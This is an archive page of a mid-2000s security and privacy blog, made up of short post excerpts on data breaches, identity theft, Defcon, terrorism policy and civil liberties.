[Update: A less in-your-face version is Preserving the Internet Channel Against Phishers.] In his talk at Defcon, David Cowan talked about how he doesn’t bank online anymore. Banks are now facing the imminent destruction of their highest bandwidth, lowest cost way to interact with customers. Actually, its worse than that. Bankers are killing online banking, […]

 

On Vacation

I’m on vacation through Sunday, and won’t be blogging until next week.

 

Lindstrom's Indemnification

Pete Lindstrom has very nicely offered to indemnify me, and pay my outrageous consulting fees when no one else will, if only I break NDAs and disclose which 0day exploits were used against which of my clients. Well, the city of Tokyo…No, I’ve never worked for the city of Tokyo. Now, as I’ve said repeatedly, […]

 

Sonoma State, 61,709 SSNs, Hacker

Hackers have broken into Sonoma State University’s computer system, where they had access to the names and Social Security numbers of 61,709 people who either attended, applied, graduated or worked at the school from 1995 to 2002, university officials disclosed Monday. So says SF Chronicle. Sonoma State has a page.

 

Costco Employees and "Market Analysts"

The job of a shareholder-owned company is to make money for shareholders, not to coddle its employees. But sometimes, being good to your employees can be good for the shareholders. In “Living the Dog’s Life at Costco,” Kevin Carson takes to task Wall St analysts who are trying to run Costco’s business for them: “He […]

 

New Blog Pointers

Frequent commenter Allan Friedman has started Geek/Wonk. In “Speaking of duct tape,” he links to an interesting essay Duct Tape Risk Communication. And Mario’s comments on tor vs the Freedom Network are interesting: Interestingly, the usability issues are _exactly_ the same as they were ~5 years ago! It’s sometimes s-l-o-w! While I agree with this, […]

 

University of North Texas, 34,000 SSNs, Bad Design + Google

The UNT server storing the electronic university housing records of about 34,000 current, former and prospective students was accessed by a computer hacker. In addition, an Internet-based form available to students to make inquiries to the UNT financial aid office mistakenly created a file containing personal information of the current and former students who used […]

 

Cal Poly, 31,077 SSNs, Hacker

Notices went out on Thursday to 31,077 people informing them that their records might have been stolen after Cal Poly Pomona discovered two computer servers were compromised in late June. “We got hit by a hacker,’ said Debra Brum, interim vice president of instructional and information technology. Personal data, including names and Social Security numbers […]

 

Microsoft's "monkeys" find first zero-day exploit

Microsoft ‘s experimental Honeymonkey project has found almost 750 Web pages that attempt to load malicious code onto visitors’ computers and detected an attack using a vulnerability that had not been publicly disclosed, the software giant said in a paper released this month. So reports Rob Lemos, in “Microsoft’s “monkeys” find first zero-day exploit.” We’ve […]

 

Balancing Information Sharing and Privacy Concerns

I’ll be at the National Conference on Science, Technology and the Law, A National Institute of Justice Conference sponsored by the National Clearinghouse for Science, Technology, and the Law, September 12-14, 2005, St. Petersburg, Florida. I’m on a panel with a great group of folks on “Balancing Information Sharing and Privacy Concerns.” We haven’t put […]

 

Life Imitates Art

America’s Finest News source reports that “Our Global Food-Service Enterprise Is Totally Down For Your Awesome Subculture” while the New York Times covers “Hip-Hop Argot Meets Corporate Cant, All to Sell Chryslers.” One story or the other contained the line: Sometimes it feels like nobody understands your rebellious, genre-defying crew of goth-rocker pals—am I right? […]

 

Two on Security Clearance

Richard Bejtlich talks about the backlog in security clearances in “Opportunity Costs of Security Clearances,” using an anecdote about an unnamed agency trying to hire someone “clearable” to train to do complex work that requires particular skills and orientation. Meanwhile, at Cutting Edge of Ecstacy, Mark writes about “A Mexican man who used a fake […]

 

Two On ID Theft

Newsfactor has a long story, “U.S. Passes the Buck on Identity Theft,” which discusses the Identity Theft Penalty Enhancement Act of 2004, some of a current crop of products designed to reduce ID theft risks at businesses, and the need to shift liability. Speaking of shifting liability, in “Despite Claims of “Exceptional” Security, Acxiom’s Defenses […]

 

Make Fire With Water, Electricity

This Aqueon Fireplace, from Heat and Glo separates water into hydrogen and oxygen, and then burns them. Because the hydrogen burns cleanly (unlike, say wood or gas), there’s no need to ventilate. As if you needed more proof that science trumps idiocy. I look forward to having six hydrogen burners in my stove. Because that […]

 

Passport Forgery Legal in UK?

The arrest of the Algerian-born Britain with 452 forged European passports at Bangkok’s Don Muang airport is only the latest in incidences of document forging in Thailand. … But here’s the rub: The suspect, 35 year old Mahieddine Daikh, may not be charged with any crime. To date none of the government’s whose forged passports […]

 

The Control Impulse, The Security Canard, and The Boy Who Cried Wolf

Flyertalk brings us the story of Continental Airlines and Boston’s Logan Airport having a little spat. The core of the dispute is that Continental offers its customers Wifi access for free. But Boston wants to charge for it. Boston has always had a bit of a control thing. That’s not unique. There are lots of […]

 

Short Bits on Terrorism

Thurston points to “London blasts – expert comments” at the London School of Economics. I know you all come here for the bombast and snark, so be warned: These are trained professionals. Do not try this on your blog. Boyodite William Lind reports on the “Modern Warfare Symposium,” organized by (ret) Colonel Mike Wyly. The […]

 

Flag Desecrations?

Over at Sivacracy, Ann Bartow is running a series of pictures on flag desecration.

 

Real American Heroes

Marty Lederman has a long post, “The Heroes of the Pentagon’s Interrogation Scandal — Finally, the JAG Memos” about the Judge Advocate Generals of the Armed Forces, who took a stand against the President’s position that the United States could behave as it has at Guantanamo and elsewhere: The memos are extraordinary. They are written […]

 

Defcon Coverage?

Defcon is better experienced than read about. How could I argue with a slogan like “What happens in Vegas gets posted to thousands of blogs? stays in Vegas?” But when those involved blog about it, I’ll admit to a little involvement: I recruited Brian Krebs onto team Shmoo. Because everyone knows I’m a Shmoo wannabe. […]

 

The Fifth Workshop on the Economics of Information Security (WEIS 2006)

Ross Anderson has announced that the fifth WEIS will be held in Cambridge (England) 26-28 June 2006. Papers due March of next year. I’m sad that I’ve only made one of the WEIS workshops so far. (Life keeps interfering.) What’s there is amongst the most interesting bits being done in security. I hope they continue […]

 

CalTech, One Planet, Hacker

In the spirit of my personal information breach posts, I present to you the South African Sunday Independent’s story, “Hacker ‘outs’ news of the 10th planet of our solar system:” Brown has submitted a name for the new planet to the International Astronomical Union, which has yet to act on the proposal, but he did […]

 

Question Authority: The Life You Save May Be Your Own

Gary Wolf has an article in Wired this month: In fact, the people inside the towers were better informed and far more knowledgeable than emergency operators far from the scene. While walking down the stairs, they answered their cell phones and glanced at their BlackBerries, learning from friends that there had been a terrorist attack […]

 

The Alexis Park ATMS are Perfectly Safe

Hackaday posts pictures in “defcon day 2 – don’t use the atm.” I don’t trust the ATMs at any Defcon haunt anymore, and was surprised to see a fellow I respect stick his ATM card into the machine at Hamburger Mary’s. I do wonder if any of the well-dressed guys using the ATMs were adding […]

 

Long Bits of Stuck in McCarran International Airport

Kudos to McCarran International Airport (Las Vegas) for having free wifi. And congrats to my fellow Defcon attendees for stealing the cookie that authenticates me to this blog off that wireless net. Tech Policy points to Bill West at Counterterror blog, in “Liberty & Security vs. Terror – an American Perspective.” Its worth reading in […]

 

At Black Hat

I’m at Black Hat and Defcon through Sunday, and blogging will be light, and slightly error-prone.

 

Why Not Accept Random Searches?

In comments, Izar asks why we feel that having policemen check up on us is an affront to our liberty. He also asks that we call him a “serf of the totalitarian state machine,” so I shall. I suppose I might feel differently if, regularly, people around me were being murdered by terrorists. But the […]

 

Job Openings

My friend and colleague Scott Blake is looking for smart people: I have openings for 5 information security analysts. Level of seniority is negotiable, but I prefer senior-level folks. I’m looking for the following specialties: security awareness training/communications, secure application development, risk assessment, network architecture, and security policy development. I also have an opening for […]

 

Are Police the Best Response?

A few weeks ago, it came out that the MTA wasn’t spending their security budget: In December 2002, the Metropolitan Transportation Authority announced it had completed a lengthy assessment of potential threats to the city’s transportation infrastructure, from subway lines to major bridges. The authority, which had begun the study in the weeks after the […]

 

Canadian Telco Telus Blocks access to Union Website, How to Access

Michael Geist has the scoop at “Telus Blocks Subscriber Access to Union Website.” Short version: Telus and their union are fighting. Telus has chosen to prevent their customers from reaching “Voices for Change, the union website. I urge Telus customers to call and customer support and ask what’s up. Repeatedly. Voices for change also suggests […]

 

Risks of Data Collection and Use

David Cowan tells a sad story about his experience with unauthorized data collection and use in “Freshman Week.” Speaking of unauthorized data collection and use, Jonathan Krim reports that “License-Screening Measure Could Benefit Data Brokers:” Jason King, spokesman for the American Association of Motor Vehicle Administrators, said commercial data brokers are notorious for refusing to […]

 

If You Have Nothing to Hide…

In “Behind-the-Scenes Battle on Tracking Data Mining,” the New York Times reports that the Department of Justice really does care about privacy, and really doesn’t want those nosy Congressional committees poking about how the government operates. So, why should they care? Are they hiding something? Of course, this being a New York Times article, there’s […]

 

105°. But It's a Dry Heat

It’s going to be 105 (or so) in Las Vegas for Blackhat, and, as always, a little hotter for Defcon. Tickets for the DC702 Summit/EFF Benefit are for sale online through Monday. As a smaller, private event, I expect the AC will work. So you should be there, instead of say, lolling about by the […]

 
 

What Do You Have to Do To Get Fired Here?

Ryan Singel has the scoop. The GAO report to Congress is also covered in the New York Times, “Flight Database Found to Violate Privacy Law:” “Careless missteps such as this jeopardize the public trust and D.H.S.’ ability to deploy a much-needed, new system,” Senator Susan Collins, Republican of Maine, wrote on Friday to Secretary Michael […]

 

Consent, Submit, Forest, Trees

Kip Esquire has a good post, “On ‘Consenting’ versus ‘Submitting’ to a Search.” The upshot is: If you happen to be stopped for a search such as this, you should not say “Yes I consent” or “Sure, go ahead.” Rather try saying something like “I consent to nothing, but if you are requiring me to […]

 

Iowa State, 2037 SSNs and 2,379 CC, "Hacker"

The Iowa State University is sending out a warning to alumni Wednesday after a hacker had access to the alumnae association Web site. A computer at Iowa State University’s Alumni Association was hacked into, allowing outside access to thousands of Social Security numbers and pages of credit card information. … By tapping into the computer, […]

 

New York to Randomly Beat People In Hopes of Beating Terrorists

Police will begin randomly beating people entering city subways, officials announced Thursday after a new series of bomb attacks in London. “We just live in a world where, sadly, these kinds of security measures are necessary,” Mayor Michael Bloomberg said. “Are they intrusive? Yes, a little bit. But we are trying to find that right […]

 

"Not the Blitz"

So says SteveC, and he’s right: Its a relatively small group of criminals. At the same time, I can’t agree with his feeling that “These bombings occured in all probability because of our unprovoked invasion.” The United States was attacked before we invaded Iraq or Afghanistan. People who will kill civilians on the tube are […]

 

Small Bits: Privacy for Infringers, IEEE Cipher, Oracle, Footnotes, and a Mug

Michael Geist continues to take the Privacy Commissioner’s office to task for protecting the privacy of infringers: Moreover, the Commissioner canvassed other banks and found that at least two others did allow their customers to opt-out of such marketing. Now if only the Commissioner would reveal which banks respected their customers’ privacy and which decided […]

 

These cruel, wanton, indiscriminate bombings

With London being attacked again, I am heartened to see that the attacks were (apparently) less effective, and otherwise defer to the wisdom of Sir Winston Churchill: These cruel, wanton, indiscriminate bombings of London are, of course, a part of Hitler’s invasion plans. He hopes by killing a large number of civilians, women and children, […]

 

Happy Moon Day!

36 years ago today, two Americans landed on the moon before returning safely to Earth.   It’s a feat worth celebrating.

 

Elizabeth Blodgett Hall, 1909-2005

Elizabeth Blodgett Hall, 95, founder of Simon’s Rock College, died July 18 at Geer Nursing and Rehabilitation Center in Canaan, Conn. In 1964, with 200 acres of her family’s land and a grant of $3 million from the Margaret Kendrick Blodgett Foundation — a charitable educational trust established by her mother — she founded America’s […]

 

Who Has Time For This, Indeed?

David Cowan has a nice post on technologies he won’t fund, and why. It’s a great post. More investors should be up front about what they’re not interested in. Bessemer has funded 16 security startups–more than any other traditional VC firm–but there are some areas of security that even we have never funded, despite the […]

 

Cardsystems Death Penalty?

“CardSystems has not corrected, and cannot at this point correct, the failure to provide proper data security for those accounts,” said Tim Murphy, Visa’s senior vice president for operations in a memorandum sent to several banks. “Visa USA has decided that CardSystems should not continue to participate as an agent in the Visa system.” So […]

 

More on the FBI and ACLU

Over at Volokh, Orin Kerr writes “The New York Times ACLU Story Begins to Look A Bit Fishy.” The essence of Kerr’s argument is that with the ACLU’s request for any document mentioning the ACLU, of course they’re going to get a lot of documents: I should point out that it is at least theoretically […]

 

Oh, That's Why

Last week, I asked, Now, if Evan Kohlmann can get to this gathering, and if John Walker-Lindh can meet bin Ladin, why haven’t we penetrated and shut down more groups which are openly calling for murder? Today’s New York Times has the answer in “Large Volume of F.B.I. Files Alarms U.S. Activist Groups:” WASHINGTON, July […]

 

Acxiom, 8.2 gb of love, Bad Password

In “Acxiom’s High Tech Hacker,” Ryan Singel describes how Scott Levine downloaded 8.2 gb of data that customers had uploaded to an Acxiom FTP server. The server was misconfigured, and anyone could login and see other people’s data. “According to law enforcement, the individual arrested was a known sophisticated hacker. He evidentially gained access through […]

 

Fingerprints at Disney: The Desensitization Imperative

The Walt Disney Corporation has started fingerprinting all visitors to their parks. They claim, incorrectly, that the fingerprint scans can’t be turned into pictures of fingerprints. True Americans understand that fingerprinting is for criminals. A presumption of guilt — of criminality — underlies a company taking your fingerprints. In “Welcome to Disney World, please let […]

 

Dear Adium People…

You make a very nice client. But the “Remove Contact” menu item in the Contact menu is fucking broken. It is not clear that “Remove Contact” means “Blow away this entire group of contacts.” How about (1) making the item name plural, and (2) adding the list of contacts to be deleted to the warning […]

 

David Cowan Blogging

David Cowan (Hi David!) is the partner at Bessemer Ventures who is responsible for their security portfolio. So I’m hoping that he sticks with his new blog, “Who has time for this.” His post about Too Many Security Startups? is fascinating: The night I closed our investment in my 12th data security deal, Cyota, my […]

 

A New Birth of Freedom in Iraq?

The Committee to Protect Bloggers reports that prominent Iraqi blogger Khalid Jarrar has been taken into custody by the Iraqi mokhabarat, or secret service. Jarrar is author of Secrets in Baghdad and is the brother of Raed from Raed in the Middle. B.L. Ochman has the scoop. Raed has more. If the United States is […]

 

Small Bits of Irony

CSO Magazine’s Security Feed juxtaposes two stories, “Stolen Data Worries Financial Institutions” and “EU Ministers Promise Data Retention Agreement.” The Privacy Law has an article on fingerprinting at Disney. His blog won’t allow anonymous comments, so I’ll say read “Fingerprint Privacy.” (I’m with Nancy Kerrigan, anyway.) Chris Hoofnagle has a story about a new database […]

 

Small Bits: Silver Linings, Presidential Game Theory, Disclosure, War

Privacy Law lists the 16 states that now have notification laws. Thanks, Choicepoint! At Balkin, ‘JB’ has a long discussion of why 2nd term Presidents all seem to be scandal ridden…since the 22nd Amendment took away what game theorists call ‘the long uncertain shadow of the future.’ I nearly said something about ‘experimental confirmation’ here, […]

 

Nothing to Hide, but "Nothing to Hide"

You’ve heard of the tube, of lorries and bobbies, but “cleanskins?” It’s a word that has emerged from London after last week’s bombings. The English police believe the suspects in the case are “cleanskins” – young operatives with no background of terrorism or crime. It’s more difficult to investigate cleanskins because they have no criminal […]

 

Pre-Defcon Summit, Get Your Tickets Now

The fine folks at DC702 are going to be hosting a “pre-Defcon Summit” and fundraiser for the EFF. I’m pleased to be a featured guest, and urge you to show up, contribute to the EFF, and hang out. According to email organizers sent, they’re fast running out of tickets, so get your tickets now, and […]

 

Blue Cross of Arizona, 57,000 SSNs + Medical Data, Arizona Biodyne

The Arizona Republic brings us the news that “Medical firm’s files with personal data stolen:” The personal information of 57,000 Blue Cross Blue Shield of Arizona customers was stolen from a Phoenix-based managed care company. Arizona Biodyne, an affiliate of Magellan Health Services that manages behavioral health for Blue Cross of Arizona, began last Friday […]

 

Nelson-Smith Data Protection Bill

Kim Zetter reports in Wired, Bill Strives to Protect Privacy : Another bill introduced in the Senate judiciary committee about two weeks ago addresses some of the same issues in a comprehensive way, and several other bills address individual issues, such as notification to consumers. The commerce bill, however, is likely to go the distance […]

 

Blind Signature Patent Expiration Party

Friends, colleagues, and co-conspirators, It has been 17 long years and now the time is finally here to celebrate at the: BLIND SIGNATURE PATENT EXPIRATION PARTY WHAT: A party to celebrate the expiration of the Blind Signature patent. WHY: U.S. Patent 4,759,063 (“Blind Signature Systems“) to David Chaum is the core invention enabling privacy-protecting electronic […]

 

Alberta Health and Wellness, 670,000 Health Care Numbers, Tape

Frank Work, Alberta’s Information and Privacy Commissioner, released a report on his investigation into missing Health and Wellness computer data storage tape. Work stated the incident is a low risk for potential fraud. As soon as the incident was reported, Alberta Health and Wellness changed practices and eliminated the related tape transfer business process. … […]

 

Homegrown Bombers, ID Cards, Intelligence Activity, and Profiling

The folks over at The Counterterrorism Blog have been doing a great job the last week or so. Lots of very high quality posts, good roundups around the London attacks. I wanted to point and comment on several of their recent posts. First is Where do Homegrown British Suicide Bombers Come From?, a first person […]

 

"Israeli Style Profiling"

Less useful is another call for “Israeli style profiling,” in Bill West’s Bolstering Transit Security the Old Fashioned Way: The more such officers there are, and the better trained they are, especially if they are trained in behavioral profiling techniques like the Israeli security services have used for decades, the better protected these transportation systems […]

 

On Phishing

Item: OCC Guidance on Phishing Websites, Ethan Preston writes about The Office of the Comptroller of the Currency provided guidance for banks on appropriate countermeasures against phishing websites. The guidance provides fairly common sense advice: designate employees to respond to phishing threats, cultivate contacts with the FBI to expedite law enforcement’s response, prepare to identify […]

 

My Bleeding Snort Rules Just Alerted Me to TERRORISM!

Err, no. But I was reading a post at TaoSecurity, “How to Misuse an Intrusion Detection System:” I was dismayed to see the following thread in the bleeding-sigs mailing list recently. Essentially someone suggested using PCRE to look for this content on Web pages and email: (jihad |al Qaida|allah|destroy|kill americans|death|attack|infidels) (washington|london|new york) But such rules […]

 

Comrade Sarbanes Remains Uncorrupted

The latest critic of Sarbanes-Oxley? Michael Oxley told the International Corporate Governance Network (ICGN) annual conference yesterday that, ‘if I had another crack at it, I would have provided a bit more flexibility for small- and medium-sized companies.’ Always nice to see a fellow own up to his mistakes. From Accountancy Age, via Volubis Infosec […]

 

New Security Blogs

Jeff Moss takes blogging into thematically and visually new territory with The Black Pages, with Jeff posting on a theme, and then his speakers adding details. Now if only they had an RSS feed. Or my post. I wonder which they’ll get first? I have a soft spot for the word “chaos.” I like the […]

 

Small Bits of Liberty

Rebecca MacKinnon’s “Response to Scoble” is worth reading in its entirety. I have just one small comment: In justifying Microsoft’s filtering of politically sensitive Chinese words on MSN spaces, Microsoft’s uber-blogger Robert Scoble writes: “I have ABSOLUTELY NO BUSINESS forcing the Chinese into a position they don’t believe in.” He continues… Except Scoble Microsoft is […]

 

Pre-Defcon Summit, and some small bits

The fine folks at DC702 are going to be hosting a “pre-Defcon Summit” and fundraiser for the EFF. I’m pleased to be a featured guest, and urge you to show up, contribute to the EFF, and hang out. Hmmm, this needs some extra text to balance the icon. Dumb stylesheet. Who the heck wrote that […]

 

Random Thoughts on Specter-Leahy

Senators Specter and Leahy have proposed a new law on identity theft and privacy. Some thoughts as I read it. But first, what the hell are they doing preventing me from copying sections? Frigging DRM. Quotes shall be shorter than they otherwise would. Title III, 301.b.1 (pg21): “A data broker shall, upon the request of […]

 

Gaze Into Navels!

There’s a new feed, of posts + comments, available here: RSS. (It’s also on in the little “blog tech stuff” list, if you want to come back to see it later.) Thanks to Lisa for setting this up!

 

MSU, 27,000 SSNs, "intrusion"

More than 27,000 students were informed by e-mail on Tuesday that their Social Security numbers could have been compromised by an attack on the College of Education’s server. The server housed information that included student names, addresses, student courses and personal identification numbers. After the intrusion was discovered at the beginning of April, the server […]

 

Small Bits on Privacy

Larry Ponemon has a good article in Computerworld, “After a privacy breach, how should you break the news?:” We learned that about one-third of subjects believed that the notification was truthful. Another 41% believed that the notice they received failed to communicate all the facts. The remaining 26% were unsure about the integrity or honesty […]

 

ID Card Program Stopped Over Security Concerns

So reports the LA Times (Bugmenot) in “Pot ID Card Program Shelved:” California health officials Friday suspended a pilot program that issues photo identification to medical marijuana users out of concern that a recent U.S. Supreme Court ruling could make the state and ID holders targets for federal prosecution.

 

Small Bits: Government, Government, Government, Bill Scannell and Christopher Hitchens

Kip Esquire has a great roundup in “Linkfest — Special “Hear/See/Speak No Evil” Edition,” guaranteed to boil the blood of anyone who thinks that sometimes government goes too far. Then again, sometimes government doesn’t go far enough. In the case of New York’s MTA, they’ve spent $30m of the $600m they have available for security, […]

 

"Declaration of Repudiation?"

Dave Belfer-Shevett points to a Declaration Of Repudiation by Will Frank. It starts out pretty well, but then degenerates into complaining about gay rights, abortion, sex ed and Kyoto. Yes, I say degenerates, even if I might agree with some of these, because they’re a distraction. Reagan and Bush Sr. were opposed to abortion rights […]

 

London, Perspective

At the end of a long, thoughtful post, Thurston writes: One final thought. Four bombings in London are front-page, stop-the-presses news for two days straight. If that was Baghdad, only four bombings would have been a slow day. What message does that send the the Third World?

 

Backup Tapes?

Allan Friedman asks for comments on Lauren Weinstein’s post to Interesting People: (Lauren W) Ironically, it’s true that the probability of lost backup tapes being used opportunistically for ID theft is probably fairly low, at least in comparison to all the “ID theft supermarkets” that are out there — crooked commercial and government employees willing […]

 

An Israeli Friend in London Writes…

(This entire post is by my friend Shimrit, an Israeli living in London, and is posted with permission.) I felt the need to write down my thoughts about today so I did. Seeing as I have nowhere to publish them, I am sending them round instead. Once again, it seems my terrorist attack luck has […]

 

On "Bringing To Justice"

First, let me say that the response from not only Blair, but all of London is inspiring. They are refusing to panic after these attacks. The underground is open and running this morning (with some nervousness). At Balkanization, Kim Lane Scheppele makes an interesting point about “Britain’s State of Emergency, and the anti-terrror laws in […]

 

Ping Flood

Over at Usable Security, Ping is blogging about the SOUPS conference, which I’m unfortunately missing. Alan Schiffman is also blogging a little. However, Ping is posting so much that his first posts today have already scrolled off the top of his blog. Who knew he’d invent a new denial of service attack?

 

"These cruel, wanton, indiscriminate bombings of London…"

My sympathies to the people of London, and all those around the world who are worried about their loved ones in London. Wikipedia has a clear summary of what’s happened, along with this translation from the pigs responsible: We continue to warn the governments of Denmark and Italy and all the crusader governments that they […]

 

Citi National Bank, Thousands of Millionaires, Iron Mountain

In the San Francisco Chronicle, David Lazurus reports “Personal data lost — again:” Today I bring news of yet another security breach involving potentially thousands of people’s personal info, and this is the first anyone’s hearing of it. The latest company to drop the data ball is City National Bank, based in Los Angeles and […]

 

USC Admissions, 320,000 SSNs, SQL Injection

A programming error in the University of Southern California’s online system for accepting applications from prospective students left the personal information of as many as 320,000 users publicly accessible, school officials confirmed on Tuesday. “Sap,” discoverer of the vulnerability in USC’s Web application The flaw could have allowed an attacker to send commands to the […]

 

Russia's Information Market

Bruce Schneier mysteriously titles a post “Russia’a Black-Market Data Trade.” But its not clear to me that this is black-market at all. Does Russia have a data protection law? Quoting from The Globe and Mail: At the Gorbushka kiosk, sales are so brisk that the vendor excuses himself to help other customers while the foreigner […]

 

What Is Terrorism?

A quirk in how the U.S. government defined terrorism meant that when Chechen rebels blew up two airliners almost simultaneously over Russia last year, only one was counted in an annual tally of terrorist attacks. On board one plane were 46 Russians. But the other had 43 Russians and an Israeli citizen — a foreign […]

 

Choicepoint Roundup

At MSNBC, Bob Sullivan covers the loss of confidence in ecommerce that leaks are causing: The survey also found nearly all Americans think identity theft and spyware are serious problems, but only 28 percent think the government is doing enough to address the issues. About 70 percent said new laws are necessary to protect consumer […]

 

"The Great Equalizer"

Pittsburgh Mayor Tom Murphy tells the Post Gazette that “Eminent domain ‘is a great equalizer when you’re having a conversation with people…’” Indeed it is. Pictured is another “great equalizer.” (Quote via John Tierney in “Your Land Is My Land,” in the New York Times.)

 

Two Minutes Hate in the Blogosphere

Fred, who did graphic design for RECon, is doing a comic book of 1984. (The copyright on 1984 has expired in Canada.) He also had great “Big Brother is Watching You” posters, one of which I bought. Fred (pictured, left) was also good enough to introduce my talk, and provide a hanging banner. You can […]

 

Small Segments Stolen From Some People Surnamed "S"

The first two are from Scrivener, because he’s going on vacation, they’re good, and I’m shameless. “Iraq Swede vows to catch kidnappers, reports “The Local:” A Swede held hostage in Iraq for 67 days and released a month ago has vowed to take revenge on his captors and has hired bounty hunters to capture them, […]

 

The unanimous Declaration of the thirteen united States of America

The Declaration of Independence of the Thirteen Colonies In CONGRESS, July 4, 1776 The unanimous Declaration of the thirteen united States of America, When in the Course of human events, it becomes necessary for one people to dissolve the political bands which have connected them with another, and to assume among the powers of the […]

 

Deep Impact

We’re about 4 hours from Deep Impact making a large hole in Comet Tempel 1. The National Business Review in New Zealand has an excellent links roundup in “Comet impact: See it online.”

 

Why I Read Blogs

In a post titled “Why Blog, Anyway, Mark makes a really good point: And what about the audience? Readers who don’t blog may not be aware of how much bloggers want readers. Part (I suspect a very big part for most) of it’s an ego thing, like people on soapboxes at the town square with […]

 

Small Bits: Adam Sah on Startups, RECon, Irony and Biometrics

Adam Sah (hi Adam!) has a great page of startup advice I hadn’t seen before. Presentations from RECon are now online. The University of Connecticut will be offering a Masters in Homeland Security. That’s a database I’d like to steal. Thanks to Chris Walsh for pointing it out. I’ve been meaning to followup on Juxtaposition’s […]

 

Well Said!

“IRS announces plans to be the butt of three consecutive days of “Daily Show” jokes.” So headlines John Paczkowski’s post at Good Morning Silicon Valley.

 

Doing the Devil's Work

The Internet, with its freedom of communication, scares a lot of people. Some people argue that this is “just political,” but its not. Chinese repression includes information about health issues, such as the abuse of antibiotics to control avian flu. (See, for example, “Bird Flu Drug Rendered Useless in the Washington Post.) The companies that […]

 

Choicepoint Roundup, June 30

We open with two articles from News.com: “ChoicePoint overhaul falls behind,” (June 24) and “ChoicePoint overhaul completed, company says” (June 30). From the latter: “In fact, we’ve gone beyond our announced commitments to make substantial changes in the past 90 days,” ChoicePoint spokesman Dan McGinn said in an e-mail late Tuesday. The Alpharetta, Ga.-based data […]

 

Chase Manhattan and Textual Interpretation

Ray Everett Church picks up on a story, “Shouldn’t The CardSystems Victims Be Notified?” from Ed Foster, showing that Chase Manhattan bank has failed to read the text of California’s SB 1386. Ed writes: “Even the strictest of laws, like the one in California, require more identifying information like the individual’s social security number or […]

 

Cardsystems Auditor

I can’t find the blog that discussed the irony of a Visa spokesperson claiming that PCI worked because of the auditor’s need to put their reputation on the line, but then refused to name the auditor. According to the New York Times, in “Weakness in the Data Chain,” it was Cable and Wireless: In December […]

 

The Funeral of an American Soldier

I don’t care what you think of the conduct of a war. What you think of the reasons we’re involved in that war. The funeral of a soldier is no place for political portest, except, perhaps, maybe, if that soldier is a direct family member. The behavior of a dozen assholes from Kansas at the […]

 

Iran's New President a "Moderate"

“After all, he didn’t kill his hostages…” London, Jun. 29 – Iran Focus has learnt that the photograph of Iran’s newly-elected president, Mahmoud Ahmadinejad, holding the arm of a blindfolded American hostage on the premises of the United States embassy in Tehran was taken by an Associated Press photographer in November 1979. Prior to the […]

 

The FTC and BJs Wholesale

The FTC has recently issued a consent order to BJ’s Wholesale club in response to this complaint. The FTC, unfortunately, is the body charged with protecting consumers from ID theft. They are failing to rise to the challenge. This is obvious from the continued growth of ID theft. It is obvious from FTC Chair Deborah […]

 

Equifax CEO: ID Theft is an epidemic

But [Equifax CEO] Chapman acknowledges Equifax has “no silver bullet” when it comes to thwarting fraud. One popular belief is that checking a credit report once a year is a defense. That doesn’t protect consumers, Chapman said. “It’s not going to help and the public is starting to learn that,” Chapman said. He decried the […]

 

Fingerprint Privacy

There have been a slew of stories lately about fingerprint readers being tied into payment mechanisms. I don’t particularly like the idea, but if you do, feel free. At least until your lack of care about privacy starts displaying externalities. Many of these vendors are making claims like it is not possible to recreate the […]

 

UK ID Cards, Choicepoint, and Privacy

Usually, government ministers wait until a new program has been rolled out before they start reneging on their promised of how it will work. But in the brave new world of UK ID cards, they’re being honest. As the Independent reports in “Ministers plan to sell your ID card details to raise cash“: Personal details […]

 

A Privacy-Openness Tradeoff

In “Adoptees File Human Rights Complaint Against Canadian Privacy Commissioner,” Privacy.org reports on a dispute between the parents and children, mediated by the state: A group of Ontario adoptees has filed a human rights complaint against Privacy Commissioner Ann Cavoukian after she lobbied the province to amend its proposed adoption disclosure law with a clause […]

 

Choicepoint, Two Minutes Hate

This was going to be a roundup, but heck, There’s a backlog of hate, and I must post. Under the headline, “Who let Jeb Bush and ChoicePoint into the UK?” ‘Brother Rail Gun of Desirable Mindfulness’ points to a BBC story, “Hundreds wiped off vote register.” An oldy-but-I-Hadn’t-linked, Adrift at Sea comments in “Bleeding Edge […]

 

U Connecticut, 72,000 SSNs, Hacker

A computer containing personal information such as Social Security number and name was breached by an unauthorized intruder. Although there is no evidence indicating that this personal data was accessed or extracted, the University of Connecticut is contacting everyone whose identity may have been put at risk. … The breach occurred on October 26, 2003. […]

 

TSA Lies, Could Face Time Fines

Homeland Security officials who defied Congress and misled the public by creating secret files on American citizens while testing a new passenger screening program may have engaged in multiple counts of criminal conduct, and at least one employee has already lied to cover-up the misdeed. Read “TSA Lies, Could Face Fines” at Secondary Screening. Pictured […]

 

FinCen (IRS), Potentially tens of thousands, Complacent Bureaucrats

The U.S. tax agency — whose databases include suspicious activity reports from banks about possible terrorist or criminal transactions — launched the probe after the Government Accountability Office said in April that the IRS “routinely permitted excessive access” to the computer files. The GAO team was able to tap into the data without authorization, and […]

 

CVE Content Decisions

The fine folks at MITRE have published “CVE Abstraction Content Decisions: Rationale and Application:” This document is intended for use by Candidate Numbering Authorities (CNAs)and may be of interest to vulnerability researchers, maintainers of vulnerability databases and other CVE-compatible products and services, and technical consumers of vulnerability information on a large scale. Via OSVDB Blog, […]

 

Two There Are Always (Plus a Freebie)

Gizmodo asks “Am I the only one extremely disappointed by the fact that these upcoming Lucas-approved USB keys don’t offer a Han model?” No, you’re not. I’d get me Han in Carbonite to protect my data any day. I bet Wil Shipley would to. Anyone who can explain why Anakin went to the dark side […]

 

Dear Gmail

Thank you so much for your recent letter, telling me that We’ve noticed that you haven’t used your Gmail account, account.management@gmail.com, for quite some time. In order to make Gmail better for our users, we’ve added a lot of things in the last few months and we hope you’ll want to start using your account […]

 

Identity Thieves Drain Unemployment

But the most underpublicized identity theft crime is one in which thieves defraud state governments of payroll taxes by filing fraudulent unemployment claims. It can be a fairly lucrative scheme, too. File a false unemployment claim and you can receive $400 per week for 26 weeks. Do it for 100 Social Security numbers and you’ve […]

 

Suntrust, 75? SSNs, Employee Jonathan Bryan Adair

This post updated to replace the Suntrust logo with “You can’t shut me up by Jennifer Moo, after a bunch of bozos called “Internet Identity” sent vaguely scary letters that chilled my web hosting company. The Atlanta Journal Constitution reports that “Ex-SunTrust employee charged in check scam.” (Use Bugmenot for a login.): The U.S. attorney’s […]

 

Equifax Canada, 600 credit histories, hacker

CBC is reporting “Hacker accesses files at Equifax:” A computer hacker has accessed the files of about 600 consumers at Equifax Canada, one of Canada’s major credit bureaus. Most of the files are for consumers from British Columbia. Better Business Bureau spokesperson Sheila Chernesky said personal financial information is being gathered all the time, and […]

 

